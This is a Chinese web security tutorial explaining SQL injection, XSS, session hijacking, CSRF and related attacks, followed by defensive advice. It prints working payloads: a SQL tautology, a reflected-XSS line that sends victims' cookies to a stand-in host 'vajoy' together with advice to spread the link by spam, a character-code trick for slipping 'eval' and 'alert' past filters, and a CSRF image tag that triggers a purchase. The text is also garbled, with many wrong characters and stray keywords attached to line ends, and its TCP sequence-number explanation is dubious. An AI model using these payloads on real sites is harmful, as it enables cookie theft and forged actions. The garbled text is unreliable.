SQL注入這塊不想細聊了,相信不少朋友都聽到耳朵長繭,不外乎是提交含有SQL操做語句的信息給後端,後端若是沒有作好過濾就執行該語句,攻擊者天然能夠隨意操縱該站點的數據庫。javascript
好比有一個圖書館站點book.com,你點進一本書的詳情頁面,其url是這樣的:前端
book.com/book?id=100java
說明這本書在數據庫中的鍵值是100,後端收到url參數後就執行了數據庫查詢操做:數據庫
select * from booktable where id='100'後端
那麼若是咱們把url更改成跨域
book.com/book?id=100'or'1'='1瀏覽器
那麼數據庫操做執行就變成了:安全
select * from booktable where id='100'or'1'='1'服務器
從而取出了整個booktable表單的所有數據。cookie
XPath注入跟SQL注入差很少,只不過這裏的數據庫走的xml格式,攻擊方式天然也得按xml查找的語法來了,具體可看這裏。
cgi命令執行指的是用戶遠程訪問cgi腳本時,經過提交惡意的參數讓服務器執行相關的cgi命令來獲取信息甚至操縱服務器。有興趣的朋友能夠看下這裏。
對於這幾個攻擊,咱們須要作的天然是對提交參數的過濾,最好是前端過濾一遍,後端也過濾一遍(後端的過濾和攔截是最重要的,畢竟經過在瀏覽器禁用腳本的配置能夠躲過前端的過濾)。
XSS(cross-site scripting跨域腳本攻擊)攻擊也是最多見的WEB攻擊之一,其重點是「跨域」和「客戶端執行」。咱們仍是拿那個圖書館網站book.com來調侃下。
假設頁面右上角有一個搜索書籍的地方,你隨便輸入一本壓根就沒有的書,好比「有錢任性指南」,而後點擊「搜索」按鈕。這時候頁面(book.com/search?name=有錢任性指南)會返回一段信息:
您搜索的書籍「有錢任性指南」不存在
好的,那咱們輸入這個怎樣:
<script>alert('沒有書開個毛線書店啊')</script>
假設這個圖書館站點沒有對數據作任何過濾,並且會原封不動地把用戶輸入的數據展現回來,那麼返回的頁面天然也會返回這段腳本,從而執行它。
可是這樣很差玩,既然要作攻擊,咱們就要獲取用戶的數據,要獲取數據天然要把信息傳回咱們的服務器(假設接收信息的地址是http://vajoy/get),那我們能夠這樣寫:
<script>document.location='http://vajoy/get?cookie='+document.cookie</script>
不過這樣很差玩啊,收到的老是咱們本身的數據,咱們要收集的應該是別人的cookie信息啊!
小意思,不妨經過QQ羣,或者經過羣發垃圾郵件,來讓其餘人點擊這個地址:
book.com/search?name=<script>document.location='http://vajoy/get?cookie='+document.cookie</script>
這種即是XSS攻擊中的一種,稱爲「Reflected XSS」——基於反射的XSS攻擊,主要依靠站點服務端返回腳本,在客戶端觸發執行從而發起WEB攻擊。
與其相近的是「DOM-based or local XSS」——基於DOM或本地的XSS攻擊。拿我如今工做的項目作比方——爲用戶提供免費的wifi,可是提供免費wifi的網關會往你訪問的任何頁面插入一段腳本,從而植入懸浮廣告(固然你能夠關閉它),這貌似沒什麼,但若是插入的腳本是獲取你敏感數據的惡意腳本那就不同了。像這種直接存在於頁面,無須通過服務器返回腳本處理就直接跨域發送用戶信息的行爲就是基於本地的XSS攻擊。
還有最後一種稱爲「Stored XSS」——基於存儲的XSS攻擊。它是經過貼吧啊博客園啊等地方來發錶帶有惡意跨域腳本的帖子或文章,從而把惡意腳本存儲在裏面,每一個訪問該帖子/文章的人就會中招。
還記得一開始加載本文章的alert彈窗麼?假設博客園對文章進行了過濾,把所有「alert」啊、"eval"啊等敏感字符都過濾掉,那咱們怎麼辦?咱們能夠這樣:
<script type="text/javascript">
var x='eva'+String.fromCharCode(108),y=window,e='a'+String.fromCharCode(108)+'ert("歡迎收看本文章")';
y[x]['call'](this,e);
</script>
照樣實現咱們想要的彈窗無誤。
對於XSS的預防天然也是對提交數據的過濾,另外還有一點——謹慎返回用戶提交的內容!
會話劫持
百度百科有個頗有意思的引喻——「在現實生活中,好比你去市場買菜,在交完錢後你要求先去幹一些別的事情,稍候再來拿菜;若是這個時候某個陌生人要求把菜拿走,賣菜的人會把菜給陌生人嗎?」
這個比喻頗有意思,咱們常規訪問一個http網站時是與其服務器創建了一次HTTP會話。假設你宿舍樓的「朋友」都跟你處於同一個子網上,其中有人想假裝成你來劫持你的HTTP會話,那麼服務器會把菜,哦不,是信息返回給那我的嗎?
答案是確定的,由於HTTP會話並不安全。它在通過TCP/IP協議封裝傳輸數據時,在傳輸的數據的每個字節中插入一個32位的序列號碼,這個序列號用來保持跟蹤數據和提供可靠性(序列號是依循數據順序逐步遞增的)。第三方攻擊者能夠經過嗅探的方式來獲取用戶與服務器通信中的報文信息,若是他能猜想到數據中的序列號,那便能把合法的用戶斷開,假裝成合法用戶讓本身控制後續的通話。
對於會話劫持的預防,能夠走SSH協議、加強網絡安全系統健壯性,也可使用無序的UUID來替代通信中的序列號碼(而非逐步遞增)。
其它攻擊
其它攻擊包括有前面未說起的CSRF攻擊、釣魚攻擊和拒絕服務攻擊等。
CSRF(cross-site request forgery),翻譯爲跨站請求僞造,與XSS很是類似,但XSS是利用用戶對當前網站的信任來發起攻擊,而CSRF是利用網站對用戶的信任來發起攻擊。
依舊拿上述的圖書館站點打個比方,若是它的安全機制很鬆懈——只要用戶登陸了網站後,只要沒關閉瀏覽器,在任何狀況均可以做爲一個已經過身份驗證的用戶來作購書、借書操做(無須從新登陸或者輸入支付密碼什麼的,畢竟已經登陸驗證過一次了嘛)。
那麼咱們給一位用戶發送一份郵件怎樣,裏面放有一條轉向購書執行頁面的連接。。。噢不,那樣還得用戶點擊它,咱們想讓用戶看到的時候就馬上執行了購書操做,咱們能夠這樣作——在郵件中插入一張圖片:
<img src='http://book.com/pay?bookid=2881064151'/>
img、script、iframe標籤都是不受同源策略限制的,假設你使用的郵箱很直白地給用戶即時顯示這張圖片,而該用戶又恰好登陸了book.com且沒有關閉瀏覽器,那麼src裏的鏈接就會馬上訪問book.com/pay頁面,並按照已經過身份驗證的狀況來處理,從而作了購書的操做。
相信如今你會很清楚爲什麼如今的郵箱都不會直接顯示郵件裏的圖片了吧——都是爲了你的安全考慮。
對於CSRF攻擊,咱們所能作的能夠有:
1. 檢查報頭中的Referer參數確保請求發自正確的網站(但XHR請求可調用setRequestHeader方法來修改Referer報頭);
2. 對於任何重要的請求都須要從新驗證用戶的身份;
3. 建立一個惟一的令牌(Token),將其存在服務端的session中及客戶端的cookie中,對任何請求,都檢查兩者是否一致。
釣魚攻擊指的是網站的僞造,好比ta0bao.com,而後在其中應用XSS等方式發起攻擊。
拒絕服務(DoS)指的是向網站發起洪水同樣的請求(Traffic Floor),致使服務器超負荷並關閉,處理方法常規是採用QoS(Quality of Service)的軟硬件解決方案。
攻擊層面
攻擊層面指的是有惡意的人可能會從哪些地方來入手製造麻煩,常見的攻擊層面有三種:
一. 傳統WEB應用程序
1. 表單輸入(甚至包括hidden控件的內容);
2. cookie(經過修改cookie內容也能夠達到SQL注入攻擊的目的);
3. 報頭(有時候爲了方便統計來源數據,服務器會把客戶端發來報頭的Referer、User-Agent信息存到數據庫中,那麼經過修改報頭信息也能夠起到SQL注入工具目的)
4. 請求參數
5. 上傳文件(在文件內攜帶惡意代碼)
二. Web服務
1. 上述「傳統WEB服務」的所有方法;
2. WSDL文檔(暴露了服務端的每一個方法及其使用方式)
三. AJAX應用程序
即上述的「一」和「二」的合集
解決方案
綜上所述,咱們能夠這樣審視咱們的WEB站點:
1. 永遠不要相信客戶端傳來的任何信息,對這些信息都應先進行編碼或過濾處理;
2. 謹慎返回用戶輸入的信息;
3. 使用黑名單和白名單處理(即「不容許哪些敏感信息」或「只容許哪些信息」,白名單的效果更好但侷限性高);
4. 檢查、驗證請求來源,對每個重要的操做都進行從新驗證;
5. 使用SSL防止第三方監聽通訊(但沒法阻止XSS、CSRF、SQL注入攻擊);
6. 不要將重要文件、備份文件存放在公衆可訪問到的地方;
7. 會話ID無序化;
8. 對用戶上傳的文件進行驗證(不僅僅是格式驗證,比方一張gif圖片還應將其轉爲二進制並驗證其每幀顏色值<無符號8位>和寬高值<無符號16位>);
9. WSDL文檔應當要求用戶註冊後才能獲取;